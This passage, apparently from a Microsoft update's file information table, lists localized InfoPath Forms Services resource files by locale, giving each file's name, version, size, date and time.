microsoft.office.infopath.server.intl.resources.dll| 15.0.4454.1000| 203864| 12-May-21| 12:39 \nrepres.dll_1029| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12920| 12-May-21| 12:39 \nifsadminpages.resx.1106| ipfsadminpages.cy-gb.resx| | 31118| 12-May-21| 12:39 \nifsmain.css.1106| ifsmain.css| | 9158| 12-May-21| 12:39 \nintlcorestrings.js.1106| intlcorestrings.js| | 19938| 12-May-21| 12:39 \nipfscore.resx.1106| ipfscore.cy-gb.resx| | 10936| 12-May-21| 12:39 \nipfs.resx.1106| ipfs.cy-gb.resx| | 10829| 12-May-21| 12:39 \nifsintl.dll.1106| microsoft.office.infopath.server.intl.resources.dll| 15.0.4569.1501| 200880| 12-May-21| 12:39 \nrepres.dll_1106| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4569.1501| 12976| 12-May-21| 12:39 \nifsadminpages.resx.1030| ipfsadminpages.da-dk.resx| | 30825| 12-May-21| 12:39 \nifsmain.css.1030| ifsmain.css| | 9146| 12-May-21| 12:39 \nintlcorestrings.js.1030| intlcorestrings.js| | 19687| 12-May-21| 12:39 \nipfscore.resx.1030| ipfscore.da-dk.resx| | 10863| 12-May-21| 12:39 \nipfs.resx.1030| ipfs.da-dk.resx| | 10734| 12-May-21| 12:39 \nifsintl.dll.1030| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 200312| 12-May-21| 12:39 \nrepres.dll_1030| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12920| 12-May-21| 12:39 \nifsadminpages.resx.1031| ipfsadminpages.de-de.resx| | 31751| 12-May-21| 12:39 \nifsmain.css.1031| ifsmain.css| | 9146| 12-May-21| 12:39 \nintlcorestrings.js.1031| intlcorestrings.js| | 21239| 12-May-21| 12:39 \nipfscore.resx.1031| ipfscore.de-de.resx| | 11069| 12-May-21| 12:39 \nipfs.resx.1031| ipfs.de-de.resx| | 10997| 12-May-21| 12:39 \nifsintl.dll.1031| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 213624| 12-May-21| 12:39 \nrepres.dll_1031| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4442.1000| 12920| 12-May-21| 12:39 \nifsadminpages.resx.1032| ipfsadminpages.el-gr.resx| | 41816| 12-May-21| 12:39 \nifsmain.css.1032| ifsmain.css| | 9146| 12-May-21| 12:39 \nintlcorestrings.js.1032| intlcorestrings.js| | 30737| 12-May-21| 12:39 \nipfscore.resx.1032| ipfscore.el-gr.resx| | 13552| 12-May-21| 12:39 \nipfs.resx.1032| ipfs.el-gr.resx| | 13236| 12-May-21| 12:39 \nifsintl.dll.1032| microsoft.office.infopath.server.intl.resources.dll| 15.0.4420.1017| 301680| 12-May-21| 12:39 \nrepres.dll_1032| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12920| 12-May-21| 12:39 \nifsadminpages.resx.3082| ipfsadminpages.es-es.resx| | 32357| 12-May-21| 12:39 \nifsmain.css.3082| ifsmain.css| | 9146| 12-May-21| 12:39 \nintlcorestrings.js.3082| intlcorestrings.js| | 20483| 12-May-21| 12:39 \nipfscore.resx.3082| ipfscore.es-es.resx| | 11331| 12-May-21| 12:39 \nipfs.resx.3082| ipfs.es-es.resx| | 11005| 12-May-21| 12:39 \nifsintl.dll.3082| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 207480| 12-May-21| 12:39 \nrepres.dll_3082| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4442.1000| 12920| 12-May-21| 12:39 \nifsadminpages.resx.1061| ipfsadminpages.et-ee.resx| | 30597| 12-May-21| 12:39 \nifsmain.css.1061| ifsmain.css| | 9146| 12-May-21| 12:39 \nintlcorestrings.js.1061| intlcorestrings.js| | 19288| 12-May-21| 12:39 \nipfscore.resx.1061| ipfscore.et-ee.resx| | 10775| 12-May-21| 12:39 \nipfs.resx.1061| ipfs.et-ee.resx| | 10702| 12-May-21| 12:39 \nifsintl.dll.1061| microsoft.office.infopath.server.intl.resources.dll| 15.0.4460.1000| 187488| 12-May-21| 12:39 \nrepres.dll_1061| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12920| 12-May-21| 12:39 \nifsadminpages.resx.1069| ipfsadminpages.eu-es.resx| | 31518| 12-May-21| 12:39 \nifsmain.css.1069| ifsmain.css| | 9146| 12-May-21| 12:39 \nintlcorestrings.js.1069| intlcorestrings.js| | 19863| 12-May-21| 12:39 \nipfscore.resx.1069| ipfscore.eu-es.resx| | 11104| 12-May-21| 12:39 \nipfs.resx.1069| ipfs.eu-es.resx| | 10967| 12-May-21| 12:39 \nifsintl.dll.1069| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 200312| 12-May-21| 12:39 \nrepres.dll_1069| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12936| 12-May-21| 12:39 \nifsadminpages.resx.1035| ipfsadminpages.fi-fi.resx| | 31414| 12-May-21| 12:39 \nifsmain.css.1035| ifsmain.css| | 9200| 12-May-21| 12:39 \nintlcorestrings.js.1035| intlcorestrings.js| | 20382| 12-May-21| 12:39 \nipfscore.resx.1035| ipfscore.fi-fi.resx| | 10952| 12-May-21| 12:39 \nipfs.resx.1035| ipfs.fi-fi.resx| | 11028| 12-May-21| 12:39 \nifsintl.dll.1035| microsoft.office.infopath.server.intl.resources.dll| 15.0.4420.1017| 199800| 12-May-21| 12:39 \nrepres.dll_1035| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12944| 12-May-21| 12:39 \nifsadminpages.resx.1036| ipfsadminpages.fr-fr.resx| | 32806| 12-May-21| 12:39 \nifsmain.css.1036| ifsmain.css| | 9146| 12-May-21| 12:39 \nintlcorestrings.js.1036| intlcorestrings.js| | 20746| 12-May-21| 12:39 \nipfscore.resx.1036| ipfscore.fr-fr.resx| | 11334| 12-May-21| 12:39 \nipfs.resx.1036| ipfs.fr-fr.resx| | 11205| 12-May-21| 12:39 \nifsintl.dll.1036| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 214648| 12-May-21| 12:39 \nrepres.dll_1036| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4442.1000| 12920| 12-May-21| 12:39 \nifsadminpages.resx.2108| ipfsadminpages.ga-ie.resx| | 32313| 12-May-21| 12:39 \nifsmain.css.2108| ifsmain.css| | 9158| 12-May-21| 12:39 \nintlcorestrings.js.2108| intlcorestrings.js| | 21674| 12-May-21| 12:39 \nipfscore.resx.2108| ipfscore.ga-ie.resx| | 11278| 12-May-21| 12:39 \nipfs.resx.2108| ipfs.ga-ie.resx| | 11147| 12-May-21| 12:39 \nifsintl.dll.2108| microsoft.office.infopath.server.intl.resources.dll| 15.0.4569.1501| 211632| 12-May-21| 12:39 \nrepres.dll_2108| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4569.1501| 12976| 12-May-21| 12:39 \nifsadminpages.resx.1110| ipfsadminpages.gl-es.resx| | 31864| 12-May-21| 12:39 \nifsmain.css.1110| ifsmain.css| | 9200| 12-May-21| 12:39 \nintlcorestrings.js.1110| intlcorestrings.js| | 19922| 12-May-21| 12:39 \nipfscore.resx.1110| ipfscore.gl-es.resx| | 11242| 12-May-21| 12:39 \nipfs.resx.1110| ipfs.gl-es.resx| | 10994| 12-May-21| 12:39 \nifsintl.dll.1110| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 203384| 12-May-21| 12:39 \nrepres.dll_1110| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12944| 12-May-21| 12:39 \nifsadminpages.resx.1037| ipfsadminpages.he-il.resx| | 33782| 12-May-21| 12:39 \nifsmain.css.1037| ifsmain.css| | 9371| 12-May-21| 12:39 \nintlcorestrings.js.1037| intlcorestrings.js| | 22910| 12-May-21| 12:39 \nipfscore.resx.1037| ipfscore.he-il.resx| | 11561| 12-May-21| 12:39 \nipfs.resx.1037| ipfs.he-il.resx| | 11537| 12-May-21| 12:39 \nifsintl.dll.1037| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 221816| 12-May-21| 12:39 \nrepres.dll_1037| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4442.1000| 12920| 12-May-21| 12:39 \nifsadminpages.resx.1081| ipfsadminpages.hi-in.resx| | 43487| 12-May-21| 12:39 \nifsmain.css.1081| ifsmain.css| | 9003| 12-May-21| 12:39 \nintlcorestrings.js.1081| intlcorestrings.js| | 33551| 12-May-21| 12:39 \nipfscore.resx.1081| ipfscore.hi-in.resx| | 13970| 12-May-21| 12:39 \nipfs.resx.1081| ipfs.hi-in.resx| | 14513| 12-May-21| 12:39 \nifsintl.dll.1081| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 318608| 12-May-21| 12:39 \nrepres.dll_1081| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12944| 12-May-21| 12:39 \nifsadminpages.resx.1050| ipfsadminpages.hr-hr.resx| | 31720| 12-May-21| 12:40 \nifsmain.css.1050| ifsmain.css| | 9146| 12-May-21| 12:40 \nintlcorestrings.js.1050| intlcorestrings.js| | 19881| 12-May-21| 12:40 \nipfscore.resx.1050| ipfscore.hr-hr.resx| | 11113| 12-May-21| 12:40 \nipfs.resx.1050| ipfs.hr-hr.resx| | 10880| 12-May-21| 12:40 \nifsintl.dll.1050| microsoft.office.infopath.server.intl.resources.dll| 15.0.4466.1000| 197712| 12-May-21| 12:40 \nrepres.dll_1050| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12920| 12-May-21| 12:40 \nifsadminpages.resx.1038| ipfsadminpages.hu-hu.resx| | 32257| 12-May-21| 12:40 \nifsmain.css.1038| ifsmain.css| | 9146| 12-May-21| 12:40 \nintlcorestrings.js.1038| intlcorestrings.js| | 20837| 12-May-21| 12:40 \nipfscore.resx.1038| ipfscore.hu-hu.resx| | 11196| 12-May-21| 12:40 \nipfs.resx.1038| ipfs.hu-hu.resx| | 11142| 12-May-21| 12:40 \nifsintl.dll.1038| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 208504| 12-May-21| 12:40 \nrepres.dll_1038| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12920| 12-May-21| 12:40 \nifsadminpages.resx.1057| ipfsadminpages.id-id.resx| | 30440| 12-May-21| 12:40 \nifsmain.css.1057| ifsmain.css| | 9146| 12-May-21| 12:40 \nintlcorestrings.js.1057| intlcorestrings.js| | 19606| 12-May-21| 12:40 \nipfscore.resx.1057| ipfscore.id-id.resx| | 10817| 12-May-21| 12:40 \nipfs.resx.1057| ipfs.id-id.resx| | 10752| 12-May-21| 12:40 \nifsintl.dll.1057| microsoft.office.infopath.server.intl.resources.dll| 15.0.4481.1000| 194128| 12-May-21| 12:40 \nrepres.dll_1057| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4463.1000| 12896| 12-May-21| 12:40 \nifsadminpages.resx.1040| ipfsadminpages.it-it.resx| | 31375| 12-May-21| 12:40 \nifsmain.css.1040| ifsmain.css| | 9146| 12-May-21| 12:40 \nintlcorestrings.js.1040| intlcorestrings.js| | 20019| 12-May-21| 12:40 \nipfscore.resx.1040| ipfscore.it-it.resx| | 11079| 12-May-21| 12:40 \nipfs.resx.1040| ipfs.it-it.resx| | 10850| 12-May-21| 12:40 \nifsintl.dll.1040| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 203384| 12-May-21| 12:40 \nrepres.dll_1040| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4442.1000| 12920| 12-May-21| 12:40 \nifsadminpages.resx.1041| ipfsadminpages.ja-jp.resx| | 34199| 12-May-21| 12:39 \nifsmain.css.1041| ifsmain.css| | 11638| 12-May-21| 12:39 \nintlcorestrings.js.1041| intlcorestrings.js| | 23131| 12-May-21| 12:39 \nipfscore.resx.1041| ipfscore.ja-jp.resx| | 11661| 12-May-21| 12:39 \nipfs.resx.1041| ipfs.ja-jp.resx| | 11466| 12-May-21| 12:39 \nifsintl.dll.1041| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 233592| 12-May-21| 12:39 \nrepres.dll_1041| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4442.1000| 12920| 12-May-21| 12:39 \nifsadminpages.resx.1087| ipfsadminpages.kk-kz.resx| | 38393| 12-May-21| 12:40 \nifsmain.css.1087| ifsmain.css| | 9204| 12-May-21| 12:40 \nintlcorestrings.js.1087| intlcorestrings.js| | 26929| 12-May-21| 12:40 \nipfscore.resx.1087| ipfscore.kk-kz.resx| | 12573| 12-May-21| 12:40 \nipfs.resx.1087| ipfs.kk-kz.resx| | 12659| 12-May-21| 12:40 \nifsintl.dll.1087| microsoft.office.infopath.server.intl.resources.dll| 15.0.4454.1000| 265808| 12-May-21| 12:40 \nrepres.dll_1087| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4454.1000| 12864| 12-May-21| 12:40 \nifsadminpages.resx.1042| ipfsadminpages.ko-kr.resx| | 31506| 12-May-21| 12:40 \nifsmain.css.1042| ifsmain.css| | 9832| 12-May-21| 12:40 \nintlcorestrings.js.1042| intlcorestrings.js| | 20992| 12-May-21| 12:40 \nipfscore.resx.1042| ipfscore.ko-kr.resx| | 11036| 12-May-21| 12:40 \nipfs.resx.1042| ipfs.ko-kr.resx| | 10874| 12-May-21| 12:40 \nifsintl.dll.1042| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 211064| 12-May-21| 12:40 \nrepres.dll_1042| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4442.1000| 12920| 12-May-21| 12:40 \nifsadminpages.resx.1063| ipfsadminpages.lt-lt.resx| | 31596| 12-May-21| 12:40 \nifsmain.css.1063| ifsmain.css| | 9146| 12-May-21| 12:40 \nintlcorestrings.js.1063| intlcorestrings.js| | 20079| 12-May-21| 12:40 \nipfscore.resx.1063| ipfscore.lt-lt.resx| | 11077| 12-May-21| 12:40 \nipfs.resx.1063| ipfs.lt-lt.resx| | 10884| 12-May-21| 12:40 \nifsintl.dll.1063| microsoft.office.infopath.server.intl.resources.dll| 15.0.4460.1000| 195168| 12-May-21| 12:40 \nrepres.dll_1063| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12920| 12-May-21| 12:40 \nifsadminpages.resx.1062| ipfsadminpages.lv-lv.resx| | 31636| 12-May-21| 12:40 \nifsmain.css.1062| ifsmain.css| | 9147| 12-May-21| 12:40 \nintlcorestrings.js.1062| intlcorestrings.js| | 20252| 12-May-21| 12:40 \nipfscore.resx.1062| ipfscore.lv-lv.resx| | 11211| 12-May-21| 12:40 \nipfs.resx.1062| ipfs.lv-lv.resx| | 10981| 12-May-21| 12:40 \nifsintl.dll.1062| microsoft.office.infopath.server.intl.resources.dll| 15.0.4420.1017| 198288| 12-May-21| 12:40 \nrepres.dll_1062| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12920| 12-May-21| 12:40 \nifsadminpages.resx.1071| ipfsadminpages.mk-mk.resx| | 39885| 12-May-21| 12:40 \nifsmain.css.1071| ifsmain.css| | 9158| 12-May-21| 12:40 \nintlcorestrings.js.1071| intlcorestrings.js| | 27605| 12-May-21| 12:40 \nipfscore.resx.1071| ipfscore.mk-mk.resx| | 12964| 12-May-21| 12:40 \nipfs.resx.1071| ipfs.mk-mk.resx| | 12891| 12-May-21| 12:40 \nifsintl.dll.1071| microsoft.office.infopath.server.intl.resources.dll| 15.0.4569.1501| 271024| 12-May-21| 12:40 \nrepres.dll_1071| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4569.1501| 12976| 12-May-21| 12:40 \nifsadminpages.resx.1086| ipfsadminpages.ms-my.resx| | 30493| 12-May-21| 12:40 \nifsmain.css.1086| ifsmain.css| | 9216| 12-May-21| 12:40 \nintlcorestrings.js.1086| intlcorestrings.js| | 19705| 12-May-21| 12:40 \nipfscore.resx.1086| ipfscore.ms-my.resx| | 10762| 12-May-21| 12:40 \nipfs.resx.1086| ipfs.ms-my.resx| | 10725| 12-May-21| 12:40 \nifsintl.dll.1086| microsoft.office.infopath.server.intl.resources.dll| 15.0.4481.1000| 195152| 12-May-21| 12:40 \nrepres.dll_1086| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12920| 12-May-21| 12:40 \nifsadminpages.resx.1044| ipfsadminpages.nb-no.resx| | 30116| 12-May-21| 12:40 \nifsmain.css.1044| ifsmain.css| | 9146| 12-May-21| 12:40 \nintlcorestrings.js.1044| intlcorestrings.js| | 19242| 12-May-21| 12:40 \nipfscore.resx.1044| ipfscore.nb-no.resx| | 10746| 12-May-21| 12:40 \nipfs.resx.1044| ipfs.nb-no.resx| | 10566| 12-May-21| 12:40 \nifsintl.dll.1044| microsoft.office.infopath.server.intl.resources.dll| 15.0.4420.1017| 191632| 12-May-21| 12:40 \nrepres.dll_1044| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12920| 12-May-21| 12:40 \nifsadminpages.resx.1043| ipfsadminpages.nl-nl.resx| | 31781| 12-May-21| 12:40 \nifsmain.css.1043| ifsmain.css| | 9146| 12-May-21| 12:40 \nintlcorestrings.js.1043| intlcorestrings.js| | 21054| 12-May-21| 12:40 \nipfscore.resx.1043| ipfscore.nl-nl.resx| | 11138| 12-May-21| 12:40 \nipfs.resx.1043| ipfs.nl-nl.resx| | 11044| 12-May-21| 12:40 \nifsintl.dll.1043| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 207992| 12-May-21| 12:40 \nrepres.dll_1043| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4442.1000| 12920| 12-May-21| 12:40 \nifsadminpages.resx.1045| ipfsadminpages.pl-pl.resx| | 32265| 12-May-21| 12:40 \nifsmain.css.1045| ifsmain.css| | 9146| 12-May-21| 12:40 \nintlcorestrings.js.1045| intlcorestrings.js| | 20582| 12-May-21| 12:40 \nipfscore.resx.1045| ipfscore.pl-pl.resx| | 11335| 12-May-21| 12:40 \nipfs.resx.1045| ipfs.pl-pl.resx| | 11157| 12-May-21| 12:40 \nifsintl.dll.1045| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 209552| 12-May-21| 12:40 \nrepres.dll_1045| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12952| 12-May-21| 12:40 \nifsadminpages.resx.1164| ipfsadminpages.prs-af.resx| | 35762| 12-May-21| 12:40 \nifsmain.css.1164| ifsmain.css| | 9142| 12-May-21| 12:40 \nintlcorestrings.js.1164| intlcorestrings.js| | 25391| 12-May-21| 12:40 \nipfscore.resx.1164| ipfscore.prs-af.resx| | 11977| 12-May-21| 12:40 \nipfs.resx.1164| ipfs.prs-af.resx| | 12211| 12-May-21| 12:40 \nifsintl.dll.1164| microsoft.office.infopath.server.intl.resources.dll| 15.0.4569.1501| 241840| 12-May-21| 12:40 \nrepres.dll_1164| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4569.1501| 12976| 12-May-21| 12:40 \nifsadminpages.resx.1046| ipfsadminpages.pt-br.resx| | 32127| 12-May-21| 12:40 \nifsmain.css.1046| ifsmain.css| | 9146| 12-May-21| 12:40 \nintlcorestrings.js.1046| intlcorestrings.js| | 19944| 12-May-21| 12:40 \nipfscore.resx.1046| ipfscore.pt-br.resx| | 11246| 12-May-21| 12:40 \nipfs.resx.1046| ipfs.pt-br.resx| | 11015| 12-May-21| 12:40 \nifsintl.dll.1046| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 204920| 12-May-21| 12:40 \nrepres.dll_1046| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4442.1000| 12920| 12-May-21| 12:40 \nifsadminpages.resx.2070| ipfsadminpages.pt-pt.resx| | 31960| 12-May-21| 12:40 \nifsmain.css.2070| ifsmain.css| | 9146| 12-May-21| 12:40 \nintlcorestrings.js.2070| intlcorestrings.js| | 20362| 12-May-21| 12:40 \nipfscore.resx.2070| ipfscore.pt-pt.resx| | 11174| 12-May-21| 12:40 \nipfs.resx.2070| ipfs.pt-pt.resx| | 11040| 12-May-21| 12:40 \nifsintl.dll.2070| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 206456| 12-May-21| 12:40 \nrepres.dll_2070| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4442.1000| 12920| 12-May-21| 12:40 \nifsadminpages.resx.1048| ipfsadminpages.ro-ro.resx| | 31798| 12-May-21| 12:40 \nifsmain.css.1048| ifsmain.css| | 9220| 12-May-21| 12:40 \nintlcorestrings.js.1048| intlcorestrings.js| | 20321| 12-May-21| 12:40 \nipfscore.resx.1048| ipfscore.ro-ro.resx| | 11136| 12-May-21| 12:40 \nipfs.resx.1048| ipfs.ro-ro.resx| | 10967| 12-May-21| 12:40 \nifsintl.dll.1048| microsoft.office.infopath.server.intl.resources.dll| 15.0.4454.1000| 203360| 12-May-21| 12:40 \nrepres.dll_1048| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12920| 12-May-21| 12:40 \nifsadminpages.resx.1049| ipfsadminpages.ru-ru.resx| | 38683| 12-May-21| 12:40 \nifsmain.css.1049| ifsmain.css| | 9146| 12-May-21| 12:40 \nintlcorestrings.js.1049| intlcorestrings.js| | 27083| 12-May-21| 12:40 \nipfscore.resx.1049| ipfscore.ru-ru.resx| | 12767| 12-May-21| 12:40 \nipfs.resx.1049| ipfs.ru-ru.resx| | 12649| 12-May-21| 12:40 \nifsintl.dll.1049| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 271992| 12-May-21| 12:40 \nrepres.dll_1049| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4442.1000| 12920| 12-May-21| 12:40 \nifsadminpages.resx.1051| ipfsadminpages.sk-sk.resx| | 32188| 12-May-21| 12:40 \nifsmain.css.1051| ifsmain.css| | 9146| 12-May-21| 12:40 \nintlcorestrings.js.1051| intlcorestrings.js| | 20402| 12-May-21| 12:40 \nipfscore.resx.1051| ipfscore.sk-sk.resx| | 11309| 12-May-21| 12:40 \nipfs.resx.1051| ipfs.sk-sk.resx| | 11077| 12-May-21| 12:40 \nifsintl.dll.1051| microsoft.office.infopath.server.intl.resources.dll| 15.0.4460.1000| 204384| 12-May-21| 12:40 \nrepres.dll_1051| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4460.1000| 12880| 12-May-21| 12:40 \nifsadminpages.resx.1060| ipfsadminpages.sl-si.resx| | 30992| 12-May-21| 12:40 \nifsmain.css.1060| ifsmain.css| | 9146| 12-May-21| 12:40 \nintlcorestrings.js.1060| intlcorestrings.js| | 19830| 12-May-21| 12:40 \nipfscore.resx.1060| ipfscore.sl-si.resx| | 11091| 12-May-21| 12:40 \nipfs.resx.1060| ipfs.sl-si.resx| | 10913| 12-May-21| 12:40 \nifsintl.dll.1060| microsoft.office.infopath.server.intl.resources.dll| 15.0.4454.1000| 196688| 12-May-21| 12:40 \nrepres.dll_1060| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12920| 12-May-21| 12:40 \nifsadminpages.resx.3098| ipfsadminpages.sr-cyrl-cs.resx| | 39383| 12-May-21| 12:40 \nifsmain.css.3098| ifsmain.css| | 9146| 12-May-21| 12:40 \nintlcorestrings.js.3098| intlcorestrings.js| | 27599| 12-May-21| 12:40 \nipfscore.resx.3098| ipfscore.sr-cyrl-cs.resx| | 12634| 12-May-21| 12:40 \nipfs.resx.3098| ipfs.sr-cyrl-cs.resx| | 12445| 12-May-21| 12:40 \nifsintl.dll.3098| microsoft.office.infopath.server.intl.resources.dll| 15.0.4463.1000| 269392| 12-May-21| 12:40 \nrepres.dll_3098| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4454.1000| 12864| 12-May-21| 12:40 \nifsadminpages.resx.2074| ipfsadminpages.sr-latn-cs.resx| | 31923| 12-May-21| 12:40 \nifsmain.css.2074| ifsmain.css| | 9146| 12-May-21| 12:40 \nintlcorestrings.js.2074| intlcorestrings.js| | 20194| 12-May-21| 12:40 \nipfscore.resx.2074| ipfscore.sr-latn-cs.resx| | 11058| 12-May-21| 12:40 \nipfs.resx.2074| ipfs.sr-latn-cs.resx| | 10842| 12-May-21| 12:40 \nifsintl.dll.2074| microsoft.office.infopath.server.intl.resources.dll| 15.0.4463.1000| 201296| 12-May-21| 12:40 \nrepres.dll_2074| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4454.1000| 12880| 12-May-21| 12:40 \nifsadminpages.resx.1053| ipfsadminpages.sv-se.resx| | 30790| 12-May-21| 12:40 \nifsmain.css.1053| ifsmain.css| | 9146| 12-May-21| 12:40 \nintlcorestrings.js.1053| intlcorestrings.js| | 19489| 12-May-21| 12:40 \nipfscore.resx.1053| ipfscore.sv-se.resx| | 10894| 12-May-21| 12:40 \nipfs.resx.1053| ipfs.sv-se.resx| | 10834| 12-May-21| 12:40 \nifsintl.dll.1053| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 197264| 12-May-21| 12:40 \nrepres.dll_1053| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4442.1000| 12944| 12-May-21| 12:40 \nifsadminpages.resx.1054| ipfsadminpages.th-th.resx| | 43502| 12-May-21| 12:40 \nifsmain.css.1054| ifsmain.css| | 9251| 12-May-21| 12:40 \nintlcorestrings.js.1054| intlcorestrings.js| | 33682| 12-May-21| 12:40 \nipfscore.resx.1054| ipfscore.th-th.resx| | 13301| 12-May-21| 12:40 \nipfs.resx.1054| ipfs.th-th.resx| | 13759| 12-May-21| 12:40 \nifsintl.dll.1054| microsoft.office.infopath.server.intl.resources.dll| 15.0.4454.1000| 324704| 12-May-21| 12:40 \nrepres.dll_1054| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12944| 12-May-21| 12:40 \nifsadminpages.resx.1055| ipfsadminpages.tr-tr.resx| | 31365| 12-May-21| 12:40 \nifsmain.css.1055| ifsmain.css| | 9146| 12-May-21| 12:40 \nintlcorestrings.js.1055| intlcorestrings.js| | 20111| 12-May-21| 12:40 \nipfscore.resx.1055| ipfscore.tr-tr.resx| | 10940| 12-May-21| 12:40 \nipfs.resx.1055| ipfs.tr-tr.resx| | 10852| 12-May-21| 12:40 \nifsintl.dll.1055| microsoft.office.infopath.server.intl.resources.dll| 15.0.4448.1000| 197200| 12-May-21| 12:40 \nrepres.dll_1055| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12944| 12-May-21| 12:40 \nifsadminpages.resx.1058| ipfsadminpages.uk-ua.resx| | 38181| 12-May-21| 12:40 \nifsmain.css.1058| ifsmain.css| | 9146| 12-May-21| 12:40 \nintlcorestrings.js.1058| intlcorestrings.js| | 26340| 12-May-21| 12:40 \nipfscore.resx.1058| ipfscore.uk-ua.resx| | 12851| 12-May-21| 12:40 \nipfs.resx.1058| ipfs.uk-ua.resx| | 12582| 12-May-21| 12:40 \nifsintl.dll.1058| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 265328| 12-May-21| 12:40 \nrepres.dll_1058| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 13424| 12-May-21| 12:40 \nifsadminpages.resx.1066| ipfsadminpages.vi-vn.resx| | 33432| 12-May-21| 12:40 \nifsmain.css.1066| ifsmain.css| | 9190| 12-May-21| 12:40 \nintlcorestrings.js.1066| intlcorestrings.js| | 22596| 12-May-21| 12:40 \nipfscore.resx.1066| ipfscore.vi-vn.resx| | 11537| 12-May-21| 12:40 \nipfs.resx.1066| ipfs.vi-vn.resx| | 11676| 12-May-21| 12:40 \nifsintl.dll.1066| microsoft.office.infopath.server.intl.resources.dll| 15.0.4481.1000| 227920| 12-May-21| 12:40 \nrepres.dll_1066| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12944| 12-May-21| 12:40 \nifsadminpages.resx.2052| ipfsadminpages.zh-cn.resx| | 28978| 12-May-21| 12:40 \nifsmain.css.2052| ifsmain.css| | 10572| 12-May-21| 12:40 \nintlcorestrings.js.2052| intlcorestrings.js| | 17651| 12-May-21| 12:40 \nipfscore.resx.2052| ipfscore.zh-cn.resx| | 10490| 12-May-21| 12:40 \nipfs.resx.2052| ipfs.zh-cn.resx| | 10378| 12-May-21| 12:40 \nifsintl.dll.2052| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 177784| 12-May-21| 12:40 \nrepres.dll_2052| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4442.1000| 12944| 12-May-21| 12:40 \nifsadminpages.resx.1028| ipfsadminpages.zh-tw.resx| | 29231| 12-May-21| 12:40 \nifsmain.css.1028| ifsmain.css| | 10413| 12-May-21| 12:40 \nintlcorestrings.js.1028| intlcorestrings.js| | 17798| 12-May-21| 12:40 \nipfscore.resx.1028| ipfscore.zh-tw.resx| | 10486| 12-May-21| 12:40 \nipfs.resx.1028| ipfs.zh-tw.resx| | 10408| 12-May-21| 12:40 \nifsintl.dll.1028| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 179320| 12-May-21| 12:40 \nrepres.dll_1028| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4442.1000| 12920| 12-May-21| 12:40 \nconversion.office.saext.dll| saext.dll| 15.0.4454.1000| 303216| 12-May-21| 12:44 